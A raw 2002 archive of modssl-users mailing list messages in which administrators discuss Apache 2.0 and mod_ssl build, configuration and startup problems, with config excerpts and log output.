via ESMTP for from marvin-lnx.int.tele.dk id UAA29012; Tue, 9 Apr 2002 20:18:10 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 99C77BD2A; Tue, 9 Apr 2002 20:18:17 +0200 (CEST) Date: Tue, 9 Apr 2002 20:18:17 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL Message-ID: <20020409181817.GA25015@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <20020409072004.GB20897@marvin-lnx.int.tele.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Apr 09, 2002 at 11:03:28AM -0400, Cliff Woolley wrote: > On Tue, 9 Apr 2002, Mads Toftum wrote: > > > I too could add a whole lot of reasons to not migrate if you're doing SSL. > > Up to about a week before Apache went GA, there were substantial commits to > > SSL code which to me makes it an essentially untested module. > > While I can't wholly disagree with you, I will point out that the only way > we can ever really consider SSL "tried and true" is if the people > _from_this_group_ test it extensively and help us find the problems with > it. Your participation is vital... really! > Exactly. That was the point I wanted to make - that the new SSL code needs extensive testing. I must admit that I was rather surprised when Apache went GA last friday, I had expected another month at the very least to start looking closer at it. Oh well, time to start testing :) vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 20:33:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA29606; Tue, 9 Apr 2002 20:30:33 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ewok.sytrix.com id UAA29532; Tue, 9 Apr 2002 20:29:16 +0200 (MET DST) Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226]) by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g39IYcC18304 for ; Tue, 9 Apr 2002 14:34:38 -0400 From: "Aryeh Katz" To: modssl-users@modssl.org Received: from espanol.sytrix.com by 226.balt.vasco.com via smtpd (for [209.140.121.242]) with SMTP; 9 Apr 2002 18:29:13 UT Date: Tue, 9 Apr 2002 14:27:06 -0400 MIME-Version: 1.0 Subject: Re: Need mod_ssl to install with existing Apache Message-ID: <3CB2FA3A.1448.DDDF35F6@localhost> In-reply-to: <3.0.5.32.20020409130719.018ede80@mail.sage-one.net> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Aryeh Katz" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Jack, > I am running FBSD 4.5-stable with Apache-1.3.23 with numerous mods and > other dependents all set, configured & running okay. BUT, now need SSL > and must install just the mod_ssl without any other changes, except > OpenSSH that I (believe?) I can activate from the base system. > > Being this is my first time to try this type of install and I don't > want to mess up the existing system (it's built for production and > time is of essence), I would appreciate the advice on the exact steps > to install the tarball mod_ssl-2.8.7-1.3.23.tar.gz now to set up SSL. The following is from the FAQ http://www.modssl.org/docs/2.8/ssl_faq.html When I startup Apache I get errors about undefined symbols like ap_global_ctx? [L] This actually means you installed mod_ssl as a DSO, but without rebuilding Apache with EAPI. Because EAPI is a requirement for mod_ssl, you need an extra patched Apache (containing the EAPI patches) and you have to build this Apache with EAPI enabled (explicitly specify -- enable-rule=EAPI at the APACI command line). As you can see, the Apache core is patched with EAPI (extended API) features in order to support SSL --- Aryeh Katz VASCO www.vasco.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 20:43:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA00225; Tue, 9 Apr 2002 20:42:27 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from netopf.harvard.edu id UAA00212; Tue, 9 Apr 2002 20:41:52 +0200 (MET DST) Received: from navajo (dhcp001.harvard.edu [128.103.209.201]) by netopf.harvard.edu (8.11.6/8.11.6) with SMTP id g39Ifkk01382 for ; Tue, 9 Apr 2002 14:41:46 -0400 From: "David LaPorte" To: Subject: Optional client certs or basic auth Date: Tue, 9 Apr 2002 14:41:47 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David LaPorte" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all, I'm trying to setup a website that allows client certs if a client has one, but uses HTTP basic auth over SSL otherwise. Using the example at: http://www.modssl.org/docs/2.8/ssl_howto.html#ToC10 as a guide, I came up with the following: ### SSLCACertificatePath /etc/httpd/conf/ssl.crt SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca.crt SSLCertificateChainFile /etc/httpd/conf/ssl.crt/ca.crt SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key SSLVerifyClient optional SSLVerifyDepth 2 SSLOptions +FakeBasicAuth +StrictRequire Satisfy any Order deny,allow Deny from all Allow from 10.1.1 Allow from localhost AuthType Basic AuthUserFile /etc/httpd/conf/users AuthName "Test" Require valid-user ### I moved the SSL-related lines out of the Location container to avoid these errors: [Tue Apr 9 09:07:54 2002] [error] mod_ssl: SSL error on writing data (OpenSSL library error follows) [Tue Apr 9 09:07:54 2002] [error] OpenSSL: error:1409E0E5:lib(20):func(158):reason(229) [Tue Apr 9 09:07:56 2002] [error] mod_ssl: Cannot find peer certificate chain Client authentication works fine, but if I cancel out of the client cert dialog on the browser I'm allowed full access to the site - I am not prompted for a username/password. Am I missing something? Looking through past mailing list postings, it looks like this may not be possible, but the example I mentioned above seems to state that it is. thanks! David LaPorte ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 21:37:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA03067; Tue, 9 Apr 2002 21:36:20 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA03032; Tue, 9 Apr 2002 21:35:20 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id DC7684CE75D; Tue, 9 Apr 2002 21:35:17 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g39IVC740738; Tue, 9 Apr 2002 20:31:12 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from corporation.horisone.com id TAA26860; Tue, 9 Apr 2002 19:34:25 +0200 (MET DST) Received: from CYB (pa18.bytom.sdi.tpnet.pl [217.96.197.18]) by corporation.horisone.com (8.12.2/8.12.2/Debian -5) with ESMTP id g39HX3te004176 for ; Tue, 9 Apr 2002 19:33:11 +0200 Date: Tue, 9 Apr 2002 19:39:10 +0200 From: "Cyb.org" X-Mailer: The Bat! (v1.52f) Personal X-Priority: 3 (Normal) Message-ID: <1198499640.20020409193910@horisone.com> To: modssl-users@modssl.org Subject: Re: Apache 2.0 and SSL In-Reply-To: <686CA194.49A32DEE.009AA07D@netscape.net> References: <686CA194.49A32DEE.009AA07D@netscape.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Cyb.org" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have some questions related to Apache 2.0, SSL and IPv6. IPv6-based VHosts for SSL will work? Cyb.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Apr 9 21:37:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA03078; Tue, 9 Apr 2002 21:36:33 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA03026; Tue, 9 Apr 2002 21:35:18 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7EEE24CE74F; Tue, 9 Apr 2002 21:35:17 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g39IUwO40720; Tue, 9 Apr 2002 20:30:58 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from netopf.harvard.edu id SAA23197; Tue, 9 Apr 2002 18:15:32 +0200 (MET DST) Received: from navajo (dhcp001.harvard.edu [128.103.209.201]) by netopf.harvard.edu (8.11.6/8.11.6) with SMTP id g39GFNk26913 for ; Tue, 9 Apr 2002 12:15:23 -0400 From: "David LaPorte" To: Subject: Optional client certs or basic auth Date: Tue, 9 Apr 2002 12:15:23 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David LaPorte" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all, I'm trying to setup a website that allows client certs if a client has one, but uses HTTP basic auth over SSL otherwise. Using the example at: http://www.modssl.org/docs/2.8/ssl_howto.html#ToC10 as a guide, I came up with the following: ### SSLCACertificatePath /etc/httpd/conf/ssl.crt SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca.crt SSLCertificateChainFile /etc/httpd/conf/ssl.crt/ca.crt SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key SSLVerifyClient optional SSLVerifyDepth 2 SSLOptions +FakeBasicAuth +StrictRequire Satisfy any Order deny,allow Deny from all Allow from 10.1.1 Allow from localhost AuthType Basic AuthUserFile /etc/httpd/conf/users AuthName "Test" Require valid-user ### I moved the SSL-related lines out of the Location container to avoid these errors: [Tue Apr 9 09:07:54 2002] [error] mod_ssl: SSL error on writing data (OpenSSL library error follows) [Tue Apr 9 09:07:54 2002] [error] OpenSSL: error:1409E0E5:lib(20):func(158):reason(229) [Tue Apr 9 09:07:56 2002] [error] mod_ssl: Cannot find peer certificate chain Client authentication works fine, but if I cancel out of the client cert dialog on the browser I'm allowed full access to the site - I am not prompted for a username/password. Am I missing something? Looking through past mailing list postings, it looks like this may not be possible, but the example I mentioned above seems to state that it is. thanks! David LaPorte ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 01:03:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA14516; Wed, 10 Apr 2002 01:02:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cascara.uvic.ca id BAA14479; Wed, 10 Apr 2002 01:01:20 +0200 (MET DST) Received: from diver.library.uvic.ca (diver.library.uvic.ca [142.104.37.237]) by cascara.uvic.ca (8.11.6/8.11.6) with ESMTP id g39N1EN49948 for ; Tue, 9 Apr 2002 16:01:14 -0700 Date: Tue, 9 Apr 2002 16:01:13 -0700 Mime-Version: 1.0 (Apple Message framework v481) Content-Type: text/plain; charset=US-ASCII; format=flowed Subject: apache 2.0 trying to reinitialise ssl From: Martin Hofmann To: modssl-users@modssl.org Content-Transfer-Encoding: 7bit Message-Id: X-Mailer: Apple Mail (2.481) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Martin Hofmann X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am trying to run apache 2.0.35 with ssl on a Solaris box. I can compile and install without any problems. But when I try and run it fails with an error message about (theoretically impossible) failed re-initialisation of SSL (see log extract below) (i also tried configuring mod_ssl as a shared module, but then I had problems with X509_INFO_free not being found) system: Solaris 8 on Sparcstation 20, gcc 2.95.2, openssl 0.9.6c I used the following configure options: ./configure --prefix=/usr/local/apache --enable-modules="ssl" and started the server: /usr/local/apache/bin/apachectl startssl extract from /usr/local/apache/logs/ssl_engine_log [09/Apr/2002 15:23:55 14475] [info] Init: Initializing OpenSSL library [09/Apr/2002 15:23:55 14475] [info] Init: Seeding PRNG with 1024 bytes of entropy [09/Apr/2002 15:23:55 14475] [info] Init: (jupiter.library.uvic.ca:443) Loading certificate & private key of SSL-aware server [09/Apr/2002 15:23:55 14475] [info] Init: Requesting pass phrase via builtin terminal dialog [09/Apr/2002 15:23:59 14475] [info] Init: Wiped out the queried pass phrases from memory [09/Apr/2002 15:23:59 14475] [info] Init: Generating temporary RSA private keys (512/1024 bits) [09/Apr/2002 15:24:06 14475] [info] Init: Generating temporary DH parameters (512/1024 bits) [09/Apr/2002 15:24:06 14475] [info] Init: Initializing (virtual) servers for SSL [09/Apr/2002 15:24:06 14475] [info] Init: (jupiter.library.uvic.ca:443) Configuring server for SSL protocol [09/Apr/2002 15:24:06 14475] [warn] Init: (jupiter.library.uvic.ca:443) RSA server certificate is a CA certificate (BasicConstraints: CA == TRUE !?) [09/Apr/2002 15:24:06 14475] [info] Server: Apache/2.0.35, Interface: mod_ssl/2.0.35, Library: OpenSSL/0.9.6c [09/Apr/2002 15:24:06 14475] [info] Init: Initializing OpenSSL library [09/Apr/2002 15:24:06 14475] [info] Init: Seeding PRNG with 1024 bytes of entropy [09/Apr/2002 15:24:06 14475] [info] Init: (jupiter.library.uvic.ca:443) Loading certificate & private key of SSL-aware server [09/Apr/2002 15:24:06 14475] [info] jupiter.library.uvic.ca:443 reusing existing RSA private key on restart [09/Apr/2002 15:24:06 14475] [info] Init: Generating temporary RSA private keys (512/1024 bits) [09/Apr/2002 15:24:41 14475] [info] Init: Generating temporary DH parameters (512/1024 bits) [09/Apr/2002 15:24:41 14475] [info] Init: Initializing (virtual) servers for SSL [09/Apr/2002 15:24:41 14475] [info] Init: (jupiter.library.uvic.ca:443) Configuring server for SSL protocol [09/Apr/2002 15:24:41 14475] [error] Init: (jupiter.library.uvic.ca:443) Illegal attempt to re-initialise SSL for server (theoretically shouldn't happen!) Martin Hofmann Unix Systems Administrator mhofmann@uvic.ca Library Systems Services Ph: 472-5069 McPherson Library ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 01:14:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA15358; Wed, 10 Apr 2002 01:13:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from irvexch1.rainbow.com id BAA15327; Wed, 10 Apr 2002 01:12:20 +0200 (MET DST) Message-ID: <5606C687D4C7D5119A5800508BF30DB401C0432A@mail.rainbow.com> From: Lynn Gazis To: "'modssl-users@modssl.org'" Subject: RE: Apache 2.0.* and SSL Date: Tue, 9 Apr 2002 16:14:37 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lynn Gazis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users OK, I've tested it, and so far it isn't working for me. Here are my tests: 1) Attempt to configure, on an HP UX 11.0 system, to use SSL with a cryptographic accelerator card: Set up Apache 1.3.23, on this same system, and confirmed that it ran and successfully accessed the CryptoSwift card. configure --enable-ssl --with-ssl=/home/lgazis/openssl-engine-0.9.6c --prefix=/home/lgazis/apache2 --enable-rule=SSL_EXPERIMENTAL Had to create lib directory under openssl-engine-0.9.6c and copy libraries there, since they seemed to be expected there rather than at the top level. First problem: http://httpd.apache.org/docs-2.0/install.html makes no mention of actually installing a certificate, and "make certificate" appears to no longer be the correct thing to do. Worked around this by copying conf/ssl.crt and conf/ssl.key from Apache 1.3.23 installation to Apache 2.0.35 installation. Edited httpd.conf, set ServerName to pamela, User to www, Group to nobody, Listen to my IP address and port. Edited ssl.conf and set Listen to my IP address and port, and added "SSLCryptoDevice cswift". Attempted a "bin/apachectl startssl", and got the error: "Invalid command 'SSLCryptoDevice'...". Evidently something has changed, since Apache 1.3, about how to make the cryptographic accelerators in the OpenSSL engine code work. 2) Test, on HP UX 11.0 system, attempting to use SSL and no cryptographic accelerator. Got rid of the SSLCryptoDevice line, and tested to see whether I could make Apache 2.0 work with SSL with no accelerator. This also failed; the server started, but when I generated traffic, none of my handshakes succeeded, and my error log showed lots of "[error] [client 10.10.37.185] Invalid method in request k". Tried a test with OpenSSL's s_client, instead of my own test program, generating the traffic. Ran s_client with the -connect option, and no others. Got the error: warning, not much extra random data, consider using the -rand option CONNECTED(00000003) 905:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol:s23_clnt.c:460 Attempts to specify with ssl3 or tls1 also failed to connect, though with a different error. 3) Attempted to build Apache 2.0 on Solaris 7: Configured with same options as on the HP system, but my make failed with an undefined symbol sk_new_null. Either this isn't working properly, or I am missing some key information about how I am supposed to be setting this up. I've been building and running various versions of Apache 1.3 on these same systems with no difficulty. Lynn Gazis -----Original Message----- From: Cliff Woolley [mailto:jwoolley@apache.org] Sent: Tuesday, April 09, 2002 8:03 AM To: modssl-users@modssl.org Subject: Re: Apache 2.0.* and SSL On Tue, 9 Apr 2002, Mads Toftum wrote: > I too could add a whole lot of reasons to not migrate if you're doing SSL. > Up to about a week before Apache went GA, there were substantial commits to > SSL code which to me makes it an essentially untested module. While I can't wholly disagree with you, I will point out that the only way we can ever really consider SSL "tried and true" is if the people _from_this_group_ test it extensively and help us find the problems with it. Your participation is vital... really! Thanks all, Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 01:39:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA16481; Wed, 10 Apr 2002 01:38:20 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bruce.ici-web.com id BAA16431; Wed, 10 Apr 2002 01:37:52 +0200 (MET DST) Received: from ici-web.com (public [64.63.22.201]) by bruce.ici-web.com (Postfix) with ESMTP id E73C611C004 for ; Tue, 9 Apr 2002 16:30:01 -0700 (PDT) Message-ID: <3CB37CED.50006@ici-web.com> Date: Tue, 09 Apr 2002 16:44:45 -0700 From: Ben Groeneveld User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Problem with File-Upload>20k References: <20020409053848.16404.qmail@david.speedpartner.de> Content-Type: multipart/alternative; boundary="------------000006040304090609020303" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ben Groeneveld X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------000006040304090609020303 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit To: mark.barton@aeroastro.com, modssl-users@modssl.org, mark.stewart@rspnetwork.com CC: Michael Metz , dvk@lonewolf.com Did any of you ever resolve this issue? I corresponded several months ago with Mark, who recommended an upgrade to rh7, since he didn't see the problem there anymore. I happened to have 7.1 so that worked until now I added mod_ssl. I'm trying to disable ssl but even without loading mod_ssl I still get the error when uploading large files only. I can upload files of size 8M, but a 200M sample fails. The httpd error log says: Ouch! malloc failed in malloc_block() My client is IE6 with latest 'service packs'. Tried several different client machines. With NS6 I also get: Ouch! malloc failed in malloc_block() Help or debugging suggestions would be appreciated. Thanks, BenG. Michael Metz wrote: >Hi Ben, > >sorry - I haven't fond a solution yet - I hope that with an update to Apache 2.x this problem could be solved ... >Away from apache I'm using the same versions - so there must be the problem > >Sorry > >Bye > Michael > >Ben Groeneveld schrieb : > >>Michael, I seem to have run into the same problem. Ever since I >>installed SSL (mod_ssl and openssl) for apache our file upload fails for >>large files. I'm using the java oreilly classes for the upload code. >>Have you found a resolution? This is my config. Thanks, BenG. >> >> >>Red Hat Linux release 7.1sbe (Seawolf) >>Kernel 2.4.3-6smp on an i686 >> >>bruce:~> rpm -q apache >>apache-1.3.19-5 >>bruce:~> rpm -q mod_ssl >>mod_ssl-2.8.5-3 >>bruce:~> rpm -q openssl >>openssl-0.9.6-9 >>bruce:~> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >>-- >>Ben Groeneveld >>Information Concepts, Inc., 115 N.W. Oregon, Suite 30, Bend, OR 97701 >>Mailto:BGroeneveld@ici-web.com, >>phone:541.388.3611, cell:208.52 >>0.6488 >> > >MfG > Michael Metz > SpeedPartner > >___________________________________ >NOCC, http://nocc.sourceforge.net > > > > > >. > -- Ben Groeneveld Information Concepts, Inc., 115 N.W. Oregon, Suite 30, Bend, OR 97701 Mailto:BGroeneveld@ici-web.com, phone:541.388.3611, cell:208.520.6488 --------------000006040304090609020303 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit 
To: mark.barton@aeroastro.com, modssl-users@modssl.org,
	mark.stewart@rspnetwork.com
CC: Michael Metz <metz@speedpartner.de>, dvk@lonewolf.com
Did any of you ever resolve this issue?

I corresponded several months ago with Mark, who recommended an upgrade to rh7, since he didn't see the problem there anymore. I happened to have 7.1 so that worked until now I added mod_ssl.

I'm trying to disable ssl but even without loading mod_ssl I still get the error when uploading large files only.  I can upload files of size 8M, but a 200M sample fails.  The httpd error log says:

Ouch!  malloc failed in malloc_block()

My client is IE6 with latest 'service packs'. Tried several different client machines.  With NS6 I also get:

Ouch!  malloc failed in malloc_block()

Help or debugging suggestions would be appreciated.  Thanks, BenG.

Michael Metz wrote:
Hi Ben,

sorry - I haven't fond a solution yet - I hope that with an update to Apache 2.x this problem could be solved ...
Away from apache I'm using the same versions - so there must be the problem

Sorry

Bye
  Michael

Ben Groeneveld <bgroeneveld@ici-web.com> schrieb :

Michael, I seem to have run into the same problem.  Ever since I 
installed SSL (mod_ssl and openssl) for apache our file upload fails for 
large files. I'm using the java oreilly classes for the upload code.  
Have you found a resolution?  This is my config.  Thanks, BenG.


Red Hat Linux release 7.1sbe (Seawolf)
Kernel 2.4.3-6smp on an i686

bruce:~> rpm -q apache
apache-1.3.19-5
bruce:~> rpm -q mod_ssl
mod_ssl-2.8.5-3
bruce:~> rpm -q openssl
openssl-0.9.6-9
bruce:~>


























                                                                              



-- 
Ben Groeneveld 
Information Concepts, Inc., 115 N.W. Oregon, Suite 30, Bend, OR 97701
Mailto:BGroeneveld@ici-web.com,
phone:541.388.3611, cell:208.52

0.6488

MfG
  Michael Metz
  SpeedPartner

___________________________________
NOCC, http://nocc.sourceforge.net





.


-- 
Ben Groeneveld 
Information Concepts, Inc., 115 N.W. Oregon, Suite 30, Bend, OR 97701
Mailto:BGroeneveld@ici-web.com, phone:541.388.3611, cell:208.520.6488


--------------000006040304090609020303-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 10 11:55:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA14531; Wed, 10 Apr 2002 11:54:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from services.teiath.gr id LAA14512; Wed, 10 Apr 2002 11:53:40 +0200 (MET DST) From: support@cs.teiath.gr Received: (from nobody@localhost) by services.teiath.gr (8.11.0/8.11.0) id g3A9vdE02614 for modssl-users@modssl.org; Wed, 10 Apr 2002 12:57:39 +0300 X-Authentication-Warning: services.teiath.gr: nobody set sender to support@cs.teiath.gr using -f Received: from 195.130.109.71 ( [195.130.109.71]) as user support@kde.cs.teiath.gr by webmail.teiath.gr with HTTP; Wed, 10 Apr 2002 12:57:39 +0300 Message-ID: <1018432659.3cb40c9358162@webmail.teiath.gr> Date: Wed, 10 Apr 2002 12:57:39 +0300 To: modssl-users@modssl.org Subject: Re: Problem starting apache with ssl mod_ssl References: <1018263143.3cb176675a872@webmail.teiath.gr> In-Reply-To: <1018263143.3cb176675a872@webmail.teiath.gr> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-7 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 2.3.7-cvs X-Originating-IP: 195.130.109.71 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: support@cs.teiath.gr X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear all Please help me. I'm getting very desparate. Hasn't anyone faced this problem before?? I don't know what else to try. Áñ÷éêü ìÞíõìá áðü support@cs.teiath.gr: > greetings to everyone > > i have the following problem and it will be very nice of you if you could > help me out with this! > in one redhat7.2 i have installed apache/php/ssl/mod_ssl as it can be seen at > the end of my mail > In the httpd.conf i have put the following: > > *httpd.conf* > > > Listen 80 > Listen 599 > > > > > DocumentRoot "/usr/local/apache/htdocs" > ServerName asterix.cs.teiath.gr > ServerAdmin xxxt@asterix.cs.teiath.gr > ErrorLog /usr/local/apache/logs/asterix_SSL_error_log > TransferLog /usr/local/apache/logs/asterix_SSL_access_log > SSLEngine on > SSLCipherSuite > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > SSLCertificateFile > /usr/local/apache/conf/keys/asterix.cs.teiath.gr/server.crt > SSLCertificateKeyFile > /usr/local/apache/conf/keys/asterix.cs.teiath.gr/server.key > > SSLOptions +StdEnvVars > > > SSLOptions +StdEnvVars > > SetEnvIf User-Agent ".*MSIE.*" \ > nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 > > CustomLog /usr/local/apache/logs/ssl_request_log \ > "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" > > > > when i run /usr/local/apache/bin/apactrl startssl > in the error.log are written the following: > > *log from error.log* > > [Mon Apr 8 03:59:26 2002] [notice] Apache/1.3.24 (Unix) PHP/4.1.2 > mod_gzip/1.3.19.1a DAV/1.0.3 > mod_ssl/2.8.8 OpenSSL/0.9.6b configured -- resuming normal operations > [Mon Apr 8 03:59:26 2002] [notice] suEXEC mechanism enabled (wrapper: > /usr/local/apache/bin/sue > xec) > [Mon Apr 8 03:59:26 2002] [notice] Accept mutex: sysvsem (Default: > sysvsem) > > and in the ssl_engine_log the following: > > *log from ssl_engine_log* > > [08/Apr/2002 04:15:35 29986] [info] Server: Apache/1.3.24, Interface: > mod_ssl/2.8.8, Library: OpenSSL/0.9.6b > [08/Apr/2002 04:15:35 29986] [info] Init: 1st startup round (still not > detached) > [08/Apr/2002 04:15:35 29986] [info] Init: Initializing OpenSSL library > [08/Apr/2002 04:15:35 29986] [info] Init: Loading certificate & private key > of SSL-aware server asterix.cs.teiath.gr:599 > [08/Apr/2002 04:15:35 29986] [info] Init: Requesting pass phrase via builtin > terminal dialog > [08/Apr/2002 04:15:39 29986] [info] Init: Wiped out the queried pass phrases > from memory > [08/Apr/2002 04:15:39 29986] [info] Init: Seeding PRNG with 136 bytes of > entropy > [08/Apr/2002 04:15:39 29986] [info] Init: Generating temporary RSA private > keys (512/1024 bits) > [08/Apr/2002 04:15:41 29986] [info] Init: Configuring temporary DH > parameters (512/1024 bits) > [08/Apr/2002 04:15:41 29987] [info] Init: 2nd startup round (already > detached) > [08/Apr/2002 04:15:41 29987] [info] Init: Reinitializing OpenSSL library > [08/Apr/2002 04:15:41 29987] [info] Init: Seeding PRNG with 136 bytes of > entropy > [08/Apr/2002 04:15:41 29987] [info] Init: Configuring temporary RSA private > keys (512/1024 bits) > [08/Apr/2002 04:15:41 29987] [info] Init: Configuring temporary DH > parameters (512/1024 bits) > [08/Apr/2002 04:15:41 29987] [info] Init: Initializing (virtual) servers for > SSL > [08/Apr/2002 04:15:41 29987] [info] Init: Configuring server > asterix.cs.teiath.gr:599 for SSL protocol > > when now i try through a browser https://asterix.cs.teiath.gr:599 > nothing is happening > i receive from netscape "server not response" > > then i try the following > curl https://asterix.cs.teiath.gr:599 > and it produces in the ssl_engine_log the following > > [08/Apr/2002 04:36:36 29988] [info] Connection to child 0 established > (server asterix.cs.teiath.gr:599, client 195.130.109.84) > [08/Apr/2002 